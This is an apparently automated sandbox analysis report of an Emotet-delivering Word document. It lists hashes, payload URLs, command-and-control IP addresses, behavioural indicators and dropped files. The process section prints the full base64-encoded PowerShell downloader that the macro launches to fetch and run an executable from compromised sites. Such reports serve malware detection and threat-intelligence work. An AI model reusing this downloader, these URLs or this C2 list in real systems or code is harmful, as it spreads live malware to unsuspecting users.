Analysis
-
max time kernel
135s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
01-08-2020 19:37
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.12914.10524.8198.doc
Resource
win7v200722
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.12914.10524.8198.doc
-
Size
172KB
-
MD5
cb5ae32dad8e346441d6f2cfbeb37637
-
SHA1
bb6f200969dc8840eca595912d6059b51b610772
-
SHA256
1358d1f876b1e3ab67933105eacb4778c2a17172b49668ef373de791731b641b
-
SHA512
bbfb553fdb30da962ac3524beaf408ce775bdb09c0fd3de5462892d08d5a949740cf7e116d0672791212cdf2fd174bfdbd8300552707e2ae5dec8cc44df910a3
Malware Config
Extracted
http://jambino.us/tv/DYsPb/
http://www.kappetijn.eu/wp-admin/t5Uujywz88/
http://killingworthlabs.com/wp-admin/n3tq5u168132549/
http://kevinley.com/logon/LXkUb/
http://movewithketty.com/cgi-bin/HISOotVOG/
Extracted
emotet
187.64.128.197:80
198.57.203.63:8080
163.172.107.70:8080
212.112.113.235:80
157.7.164.178:8081
181.167.35.84:80
212.156.133.218:80
185.142.236.163:443
181.143.101.19:8080
75.127.14.170:8080
115.165.3.213:80
190.55.233.156:80
139.59.12.63:8080
144.139.91.187:80
37.70.131.107:80
181.113.229.139:443
41.185.29.128:8080
177.37.81.212:443
5.79.70.250:8080
78.188.170.128:80
190.111.215.4:8080
50.116.78.109:8080
75.139.38.211:80
140.207.113.106:443
192.241.220.183:8080
192.210.217.94:8080
81.17.93.134:80
181.164.110.7:80
190.164.75.175:80
201.214.108.231:80
94.96.60.191:80
192.163.221.191:8080
91.83.93.103:443
51.38.201.19:7080
24.157.25.203:80
81.214.253.80:443
87.106.231.60:8080
37.46.129.215:8080
195.201.56.70:8080
201.235.10.215:80
107.161.30.122:8080
113.160.180.109:80
87.252.100.28:80
115.79.195.246:80
113.161.148.81:80
74.208.173.91:8080
46.105.131.68:8080
172.105.78.244:8080
189.146.1.78:443
216.75.37.196:8080
203.153.216.182:7080
153.220.182.49:80
181.134.9.162:80
178.33.167.120:8080
46.49.124.53:80
143.95.101.72:8080
77.74.78.80:443
203.153.216.178:7080
179.5.118.12:80
24.232.36.99:80
177.144.130.105:443
46.32.229.152:8080
89.108.158.234:8080
Signatures
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXE701.exeolepro32.exepid process 2168 WINWORD.EXE 2168 WINWORD.EXE 2168 WINWORD.EXE 2168 WINWORD.EXE 2168 WINWORD.EXE 2168 WINWORD.EXE 2168 WINWORD.EXE 2168 WINWORD.EXE 2168 WINWORD.EXE 2056 701.exe 2484 olepro32.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powersheLL.exeolepro32.exepid process 908 powersheLL.exe 908 powersheLL.exe 908 powersheLL.exe 2484 olepro32.exe 2484 olepro32.exe 2484 olepro32.exe 2484 olepro32.exe 2484 olepro32.exe 2484 olepro32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 908 powersheLL.exe -
Blacklisted process makes network request 2 IoCs
Processes:
powersheLL.exeflow pid process 16 908 powersheLL.exe 18 908 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
701.exeolepro32.exepid process 2056 701.exe 2484 olepro32.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
701.exedescription pid process target process PID 2056 wrote to memory of 2484 2056 701.exe olepro32.exe PID 2056 wrote to memory of 2484 2056 701.exe olepro32.exe PID 2056 wrote to memory of 2484 2056 701.exe olepro32.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/2056-12-0x00000000022C0000-0x00000000022CC000-memory.dmp emotet behavioral2/memory/2056-12-0x00000000022C0000-0x00000000022CC000-memory.dmp emotet behavioral2/memory/2484-15-0x0000000000540000-0x000000000054C000-memory.dmp emotet behavioral2/memory/2484-15-0x0000000000540000-0x000000000054C000-memory.dmp emotet -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2168 WINWORD.EXE 2168 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 908 3824 powersheLL.exe -
Drops file in System32 directory 1 IoCs
Processes:
701.exedescription ioc process File opened for modification C:\Windows\SysWOW64\SettingSyncCore\olepro32.exe 701.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.12914.10524.8198.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABSAFEAQQBJAFcAcwB2AHUAPQAnAEUAVwBGAEYARABtAGQAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBjAFUAUgBpAFQAWQBQAGAAUgBgAG8AVABvAGAAYwBvAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABDAEcASwBaAFIAZgBqAG4AIAA9ACAAJwA3ADAAMQAnADsAJABLAEEAQwBIAEsAcwB1AHQAPQAnAFgARABYAEkAWQBqAGoAZAAnADsAJABZAFMAUwBYAEgAbQBqAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMARwBLAFoAUgBmAGoAbgArACcALgBlAHgAZQAnADsAJABQAFcAQQBCAE0AaABlAHYAPQAnAFcAQwBYAFcAUABuAGcAYwAnADsAJABPAFIATQBFAEYAeQBhAGsAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AVwBlAGIAYwBMAEkARQBOAHQAOwAkAEgASQBQAFEAQgBqAHgAYQA9ACcAaAB0AHQAcAA6AC8ALwBqAGEAbQBiAGkAbgBvAC4AdQBzAC8AdAB2AC8ARABZAHMAUABiAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AawBhAHAAcABlAHQAaQBqAG4ALgBlAHUALwB3AHAALQBhAGQAbQBpAG4ALwB0ADUAVQB1AGoAeQB3AHoAOAA4AC8AKgBoAHQAdABwADoALwAvAGsAaQBsAGwAaQBuAGcAdwBvAHIAdABoAGwAYQBiAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG4AMwB0AHEANQB1ADEANgA4ADEAMwAyADUANAA5AC8AKgBoAHQAdABwADoALwAvAGsAZQB2AGkAbgBsAGUAeQAuAGMAbwBtAC8AbABvAGcAbwBuAC8ATABYAGsAVQBiAC8AKgBoAHQAdABwADoALwAvAG0AbwB2AGUAdwBpAHQAaABrAGUAdAB0AHkALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBIAEkAUwBPAG8AdABWAE8ARwAvACcALgAiAFMAUABsAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATwBJAFEAUABCAHkAZAB4AD0AJwBHAE4ASABWAFUAaQBpAG0AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFgAVQBEAFMATABnAGEAdAAgAGkAbgAgACQASABJAFAAUQBCAGoAeABhACkAewB0AHIAeQB7ACQATwBSAE0ARQBGAHkAYQBrAC4AIgBkAG8AVwBOAGAATABPAGEAYABEAEYAaQBMAGUAIgAoACQAWABVAEQAUwBMAGcAYQB0ACwAIAAkAFkAUwBTAFgASABtAGoAcgApADsAJABEAEkATwBVAEMAcABoAHgAPQAnAFUAQQBPAEsAQwB2AG4AdQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFkAUwBTAFgASABtAGoAcgApAC4AIgBMAGAARQBOAGcAdABoACIAIAAtAGcAZQAgADMANQA5ADMAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIARQBgAEEAVABlACIAKAAkAFkAUwBTAFgASABtAGoAcgApADsAJABaAFYAQgBYAE8AZwB5AGgAPQAnAEIASQBQAE8AQwByAGMAdQAnADsAYgByAGUAYQBrADsAJABUAEcAQQBJAEQAaQBpAHgAPQAnAFYASwBNAEkAWgBuAGQAbQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAEsAWgBPAEQAaABkAHcAPQAnAEYATABMAFQAQQBiAGYAYgAnAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Process spawned unexpected child process
-
C:\Users\Admin\701.exeC:\Users\Admin\701.exe1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
-
C:\Windows\SysWOW64\SettingSyncCore\olepro32.exe"C:\Windows\SysWOW64\SettingSyncCore\olepro32.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\701.exe
-
C:\Users\Admin\701.exe
-
C:\Windows\SysWOW64\SettingSyncCore\olepro32.exe
-
memory/2056-12-0x00000000022C0000-0x00000000022CC000-memory.dmpFilesize
48KB
-
memory/2168-4-0x000001EA2A308000-0x000001EA2A30D000-memory.dmpFilesize
20KB
-
memory/2168-5-0x000001EA27D0E000-0x000001EA27D2F000-memory.dmpFilesize
132KB
-
memory/2168-6-0x000001EA2A512000-0x000001EA2A514000-memory.dmpFilesize
8KB
-
memory/2168-7-0x000001EA2A514000-0x000001EA2A519000-memory.dmpFilesize
20KB
-
memory/2168-8-0x000001EA2A514000-0x000001EA2A519000-memory.dmpFilesize
20KB
-
memory/2168-9-0x000001EA2A514000-0x000001EA2A519000-memory.dmpFilesize
20KB
-
memory/2168-0-0x000001EA2A308000-0x000001EA2A30D000-memory.dmpFilesize
20KB
-
memory/2168-3-0x000001EA2A303000-0x000001EA2A308000-memory.dmpFilesize
20KB
-
memory/2168-2-0x000001EA2A512000-0x000001EA2A514000-memory.dmpFilesize
8KB
-
memory/2168-1-0x000001EA2A308000-0x000001EA2A30D000-memory.dmpFilesize
20KB
-
memory/2484-13-0x0000000000000000-mapping.dmp
-
memory/2484-15-0x0000000000540000-0x000000000054C000-memory.dmpFilesize
48KB